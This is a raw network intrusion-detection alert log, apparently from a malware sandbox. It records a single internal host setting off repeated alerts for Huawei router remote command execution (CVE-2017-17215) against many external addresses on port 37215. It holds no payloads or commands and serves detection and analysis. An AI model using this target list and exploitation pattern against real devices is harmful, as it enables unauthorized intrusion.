                                                        06/13/24-21:32:21.804451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3347637215192.168.2.14156.181.88.139
                                                        06/13/24-21:33:07.060196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6042437215192.168.2.14156.33.201.150
                                                        06/13/24-21:32:13.545540TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4417637215192.168.2.14156.94.167.250
                                                        06/13/24-21:32:54.711514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3717237215192.168.2.1441.96.177.13
                                                        06/13/24-21:32:15.610636TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5219037215192.168.2.14197.162.215.170
                                                        06/13/24-21:32:28.026904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4549637215192.168.2.14197.4.113.193
                                                        06/13/24-21:33:17.308209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4769837215192.168.2.1441.18.149.146
                                                        06/13/24-21:32:21.783737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4517837215192.168.2.1441.12.57.218
                                                        06/13/24-21:32:30.077737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4856837215192.168.2.1441.243.107.106
                                                        06/13/24-21:31:57.131026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3882437215192.168.2.14156.236.192.16
                                                        06/13/24-21:32:17.670838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5291637215192.168.2.1441.55.147.76
                                                        06/13/24-21:33:11.173865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4038037215192.168.2.1441.21.197.232
                                                        06/13/24-21:32:50.630371TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4217637215192.168.2.14197.138.175.225
                                                        06/13/24-21:32:44.476715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4199037215192.168.2.14156.34.215.160
                                                        06/13/24-21:32:21.782655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5085437215192.168.2.1441.242.185.34
                                                        06/13/24-21:32:36.266574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5116837215192.168.2.14197.210.58.250
                                                        06/13/24-21:32:56.759059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4613637215192.168.2.14156.171.161.214
                                                        06/13/24-21:32:05.377715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5934837215192.168.2.14197.68.174.112
                                                        06/13/24-21:32:07.403559TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5073237215192.168.2.1441.191.64.142
                                                        06/13/24-21:32:36.266640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6090437215192.168.2.14156.156.234.16
                                                        06/13/24-21:31:57.137112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3620237215192.168.2.14156.143.209.83
                                                        06/13/24-21:33:09.088572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4727837215192.168.2.14156.78.122.34
                                                        06/13/24-21:33:09.108501TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4093437215192.168.2.14156.228.198.161
                                                        06/13/24-21:32:32.151858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5945037215192.168.2.1441.112.37.31
                                                        06/13/24-21:33:07.043010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3332437215192.168.2.14197.87.95.98
                                                        06/13/24-21:32:56.783627TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5638037215192.168.2.1441.229.83.59
                                                        06/13/24-21:33:13.232086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5279837215192.168.2.14156.62.175.247
                                                        06/13/24-21:32:15.605962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4207037215192.168.2.14156.152.118.37
                                                        06/13/24-21:32:58.842018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3629037215192.168.2.1441.29.242.139
                                                        06/13/24-21:32:54.710468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4930037215192.168.2.14156.47.227.58
                                                        06/13/24-21:32:25.976947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4145637215192.168.2.14156.39.48.100
                                                        06/13/24-21:32:09.440087TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3965437215192.168.2.1441.29.176.191
                                                        06/13/24-21:32:21.782042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3962637215192.168.2.1441.67.22.50
                                                        06/13/24-21:32:56.754833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5699637215192.168.2.1441.216.47.31
                                                        06/13/24-21:32:56.790323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3649037215192.168.2.14197.122.211.89
                                                        06/13/24-21:32:25.996469TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4534437215192.168.2.14197.5.139.59
                                                        06/13/24-21:32:30.099978TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3741437215192.168.2.1441.255.175.232
                                                        06/13/24-21:33:04.993726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4681637215192.168.2.14197.49.192.136
                                                        06/13/24-21:31:57.132688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3659437215192.168.2.1441.183.27.219
                                                        06/13/24-21:31:57.093816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3725437215192.168.2.14156.28.204.125
                                                        06/13/24-21:33:15.253316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3802837215192.168.2.14197.88.126.151
                                                        06/13/24-21:32:46.523844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3451237215192.168.2.14197.47.177.164
                                                        06/13/24-21:33:07.042422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4721837215192.168.2.14197.6.37.108
                                                        06/13/24-21:33:04.993459TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3361637215192.168.2.1441.6.191.186
                                                        06/13/24-21:33:09.128811TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4494637215192.168.2.14156.3.26.53
                                                        06/13/24-21:33:13.229135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3542037215192.168.2.14197.73.221.232
                                                        06/13/24-21:32:50.611048TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5362637215192.168.2.14156.126.219.70
                                                        06/13/24-21:32:07.401404TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5011637215192.168.2.14197.113.148.189
                                                        06/13/24-21:33:13.231432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3453237215192.168.2.14156.94.220.244
                                                        06/13/24-21:32:34.194283TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5032237215192.168.2.1441.56.20.104
                                                        06/13/24-21:32:50.612201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3951637215192.168.2.14197.191.71.130
                                                        06/13/24-21:33:04.992413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3582837215192.168.2.14197.138.86.145
                                                        06/13/24-21:32:28.024208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5217037215192.168.2.1441.90.211.66
                                                        06/13/24-21:32:07.404371TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4802837215192.168.2.1441.84.39.228
                                                        06/13/24-21:32:38.317426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3726237215192.168.2.1441.222.110.201
                                                        06/13/24-21:32:30.100303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3608637215192.168.2.1441.13.113.141
                                                        06/13/24-21:32:46.501909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5291037215192.168.2.14156.242.86.39
                                                        06/13/24-21:32:56.757866TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5326437215192.168.2.1441.67.235.193
                                                        06/13/24-21:32:30.124946TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5492237215192.168.2.14156.170.37.19
                                                        06/13/24-21:32:58.838385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4585037215192.168.2.14156.31.207.250
                                                        06/13/24-21:32:25.977587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3953237215192.168.2.14197.120.205.227
                                                        06/13/24-21:33:09.090283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4215037215192.168.2.1441.179.153.169
                                                        06/13/24-21:32:07.402963TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5955437215192.168.2.14197.165.235.73
                                                        06/13/24-21:31:59.173690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5933837215192.168.2.1441.189.211.206
                                                        06/13/24-21:32:50.629888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4533237215192.168.2.1441.32.221.250
                                                        06/13/24-21:32:46.508007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5792037215192.168.2.1441.5.204.62
                                                        06/13/24-21:32:52.654163TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5182037215192.168.2.1441.15.85.46
                                                        06/13/24-21:31:57.137475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4795037215192.168.2.14197.112.192.179
                                                        06/13/24-21:32:46.510109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5351037215192.168.2.14197.110.144.128
                                                        06/13/24-21:32:15.631151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3855437215192.168.2.14156.176.97.4
                                                        06/13/24-21:33:09.107562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3643837215192.168.2.14197.120.45.172
                                                        06/13/24-21:33:00.869574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5787237215192.168.2.14156.31.131.22
                                                        06/13/24-21:32:38.302422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5877037215192.168.2.14197.45.182.35
                                                        06/13/24-21:31:57.093505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4024237215192.168.2.14156.250.246.86
                                                        06/13/24-21:32:36.247097TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5679237215192.168.2.14156.225.155.1
                                                        06/13/24-21:33:07.056746TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4080437215192.168.2.14197.27.239.219
                                                        06/13/24-21:32:54.708713TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4953037215192.168.2.1441.81.18.217
                                                        06/13/24-21:33:07.041452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3966637215192.168.2.14197.94.249.236
                                                        06/13/24-21:32:36.247054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3778237215192.168.2.14197.157.108.23
                                                        06/13/24-21:32:44.480506TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5547837215192.168.2.14197.28.231.70
                                                        06/13/24-21:32:15.608826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5482637215192.168.2.14197.230.13.191
                                                        06/13/24-21:32:34.217642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4210037215192.168.2.1441.196.115.145
                                                        06/13/24-21:33:13.230611TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5986437215192.168.2.14156.126.84.63
                                                        06/13/24-21:32:50.612271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5435237215192.168.2.14156.58.232.156
                                                        06/13/24-21:33:15.275591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3316837215192.168.2.14197.16.89.214
                                                        06/13/24-21:32:19.727665TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5788237215192.168.2.14156.33.75.94
                                                        06/13/24-21:32:09.439945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4784637215192.168.2.14156.104.124.16
                                                        06/13/24-21:33:15.253219TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5955037215192.168.2.14197.84.80.64
                                                        06/13/24-21:32:54.711565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3680637215192.168.2.14156.135.121.138
                                                        06/13/24-21:33:04.992317TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4173237215192.168.2.14197.143.174.239
                                                        06/13/24-21:32:09.437428TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4770437215192.168.2.14197.67.175.2
                                                        06/13/24-21:32:46.502147TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4000437215192.168.2.14197.9.70.117
                                                        06/13/24-21:32:19.749182TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5568037215192.168.2.1441.203.195.87
                                                        06/13/24-21:32:25.971104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5102437215192.168.2.14156.147.17.126
                                                        06/13/24-21:32:30.078360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5395437215192.168.2.14156.119.203.16
                                                        06/13/24-21:32:28.044672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4116237215192.168.2.14156.151.150.202
                                                        06/13/24-21:32:54.709043TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5077237215192.168.2.1441.199.204.56
                                                        06/13/24-21:32:11.487271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5559637215192.168.2.14197.127.123.29
                                                        06/13/24-21:33:13.212098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4426437215192.168.2.1441.60.91.8
                                                        06/13/24-21:32:40.355917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4461637215192.168.2.1441.44.203.33
                                                        06/13/24-21:32:21.787934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5332037215192.168.2.1441.205.49.23
                                                        06/13/24-21:32:50.612988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4607237215192.168.2.1441.105.180.38
                                                        06/13/24-21:31:57.091211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3452237215192.168.2.1441.146.71.68
                                                        06/13/24-21:31:57.091344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3412837215192.168.2.14197.103.12.224
                                                        06/13/24-21:32:11.487918TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3320837215192.168.2.1441.148.65.23
                                                        06/13/24-21:32:17.694777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4823037215192.168.2.14156.218.179.41
                                                        06/13/24-21:33:09.088402TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4174637215192.168.2.14156.19.63.254
                                                        06/13/24-21:31:57.132426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5848637215192.168.2.14197.251.185.162
                                                        06/13/24-21:32:58.820137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5960837215192.168.2.14156.227.148.177
                                                        06/13/24-21:31:57.138063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4986637215192.168.2.14197.52.51.182
                                                        06/13/24-21:32:25.976621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4188037215192.168.2.14156.6.206.235
                                                        06/13/24-21:32:38.321551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4302237215192.168.2.14156.169.167.250
                                                        06/13/24-21:33:15.251770TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5464437215192.168.2.14156.224.224.178
                                                        06/13/24-21:32:28.025943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3675637215192.168.2.1441.199.135.117
                                                        06/13/24-21:32:38.301606TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4247437215192.168.2.1441.32.31.94
                                                        06/13/24-21:32:56.788753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4494837215192.168.2.14197.180.38.130
                                                        06/13/24-21:32:23.942264TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3293837215192.168.2.14197.23.174.62
                                                        06/13/24-21:32:17.677946TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3810437215192.168.2.14197.170.121.174
                                                        06/13/24-21:32:34.192235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5046437215192.168.2.14156.194.163.116
                                                        06/13/24-21:32:46.503232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5158037215192.168.2.14197.29.54.159
                                                        06/13/24-21:32:07.417683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5728237215192.168.2.1441.47.177.55
                                                        06/13/24-21:32:03.297398TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3311437215192.168.2.14197.147.57.78
                                                        06/13/24-21:33:13.213320TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5454237215192.168.2.14197.59.231.48
                                                        06/13/24-21:32:07.415623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5232037215192.168.2.14197.131.82.104
                                                        06/13/24-21:32:44.476113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5413437215192.168.2.14197.32.1.107
                                                        06/13/24-21:33:11.154116TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4670437215192.168.2.14156.235.220.212
                                                        06/13/24-21:32:11.484975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3770837215192.168.2.14197.156.215.120
                                                        06/13/24-21:32:13.565335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4914237215192.168.2.14197.96.95.21
                                                        06/13/24-21:32:46.509660TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4543437215192.168.2.1441.53.212.65
                                                        06/13/24-21:32:56.754621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5108837215192.168.2.1441.99.89.194
                                                        06/13/24-21:32:48.569090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5302637215192.168.2.1441.60.47.158
                                                        06/13/24-21:32:21.785984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3728637215192.168.2.14197.167.195.15
                                                        06/13/24-21:32:34.191811TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4820237215192.168.2.14197.101.240.197
                                                        06/13/24-21:33:11.161120TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5749037215192.168.2.14156.24.150.71
                                                        06/13/24-21:31:59.175314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4003437215192.168.2.1441.197.76.241
                                                        06/13/24-21:32:07.401627TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5184237215192.168.2.14197.198.207.241
                                                        06/13/24-21:33:05.014438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5280437215192.168.2.1441.80.216.21
                                                        06/13/24-21:32:36.243418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5741437215192.168.2.1441.39.72.162
                                                        06/13/24-21:32:52.677044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4876637215192.168.2.14156.76.156.33
                                                        06/13/24-21:32:03.300884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5925637215192.168.2.1441.215.215.91
                                                        06/13/24-21:32:36.246840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5928637215192.168.2.14156.166.39.37
                                                        06/13/24-21:32:56.789232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3705037215192.168.2.14156.192.19.155
                                                        06/13/24-21:32:17.694302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5114237215192.168.2.14156.170.149.175
                                                        06/13/24-21:32:25.974332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5013237215192.168.2.14156.237.157.197
                                                        06/13/24-21:32:19.752588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5879837215192.168.2.14156.123.93.93
                                                        06/13/24-21:32:13.546254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4065637215192.168.2.14156.181.165.202
                                                        06/13/24-21:32:09.455634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5825637215192.168.2.1441.203.212.59
                                                        06/13/24-21:31:59.176532TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5502637215192.168.2.14197.54.176.241
                                                        06/13/24-21:33:00.885734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5604037215192.168.2.1441.220.175.2
                                                        06/13/24-21:33:07.042663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5213037215192.168.2.1441.240.110.202
                                                        06/13/24-21:32:44.452357TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4101637215192.168.2.14197.191.183.137
                                                        06/13/24-21:32:48.553929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4191837215192.168.2.14156.8.63.164
                                                        06/13/24-21:31:57.136428TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5291837215192.168.2.14156.86.41.94
                                                        06/13/24-21:33:07.057906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4679237215192.168.2.1441.32.126.116
                                                        06/13/24-21:32:28.028104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3435037215192.168.2.14197.250.33.219
                                                        06/13/24-21:32:17.697434TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5847637215192.168.2.14197.123.89.8
                                                        06/13/24-21:33:09.110728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3836437215192.168.2.1441.122.101.132
                                                        06/13/24-21:32:58.822565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3298837215192.168.2.1441.223.81.41
                                                        06/13/24-21:32:56.756777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4365837215192.168.2.14197.58.213.166
                                                        06/13/24-21:32:30.074313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5408237215192.168.2.1441.177.39.48
                                                        06/13/24-21:32:46.524532TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3565437215192.168.2.14197.141.29.52
                                                        06/13/24-21:32:50.611985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4750637215192.168.2.1441.73.53.201
                                                        06/13/24-21:32:15.636213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4597437215192.168.2.1441.17.241.74
                                                        06/13/24-21:32:05.370369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4639037215192.168.2.14197.153.118.122
                                                        06/13/24-21:32:05.346072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5105637215192.168.2.14197.162.195.141
                                                        06/13/24-21:32:15.632899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6085437215192.168.2.1441.187.196.192
                                                        06/13/24-21:32:23.835030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6030237215192.168.2.14197.112.18.153
                                                        06/13/24-21:32:11.507688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4506437215192.168.2.1441.226.153.192
                                                        06/13/24-21:32:32.153711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5756837215192.168.2.14197.30.149.170
                                                        06/13/24-21:32:25.993569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5131837215192.168.2.14156.174.135.213
                                                        06/13/24-21:31:57.153391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5373637215192.168.2.1441.139.192.174
                                                        06/13/24-21:32:42.404051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5490237215192.168.2.1441.245.0.161
                                                        06/13/24-21:32:19.729243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3374837215192.168.2.14197.98.136.236
                                                        06/13/24-21:32:13.566102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5351637215192.168.2.1441.151.96.194
                                                        06/13/24-21:32:44.477527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5413037215192.168.2.1441.13.104.203
                                                        06/13/24-21:32:42.422463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4182637215192.168.2.14197.12.139.126
                                                        06/13/24-21:32:05.378079TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5499837215192.168.2.14156.239.85.79
                                                        06/13/24-21:33:00.869450TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4220437215192.168.2.1441.50.243.107
                                                        06/13/24-21:33:07.057520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5033637215192.168.2.1441.204.204.255
                                                        06/13/24-21:32:01.248858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6055637215192.168.2.1441.73.13.140
                                                        06/13/24-21:32:30.077066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6015037215192.168.2.14197.228.87.126
                                                        06/13/24-21:33:13.227465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5749437215192.168.2.14197.155.120.51
                                                        06/13/24-21:33:17.308837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3689637215192.168.2.1441.3.140.208
                                                        06/13/24-21:32:11.487621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4362437215192.168.2.14156.111.233.77
                                                        06/13/24-21:33:17.309357TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6069237215192.168.2.14197.151.140.109
                                                        06/13/24-21:32:23.941491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5161237215192.168.2.14197.175.157.211
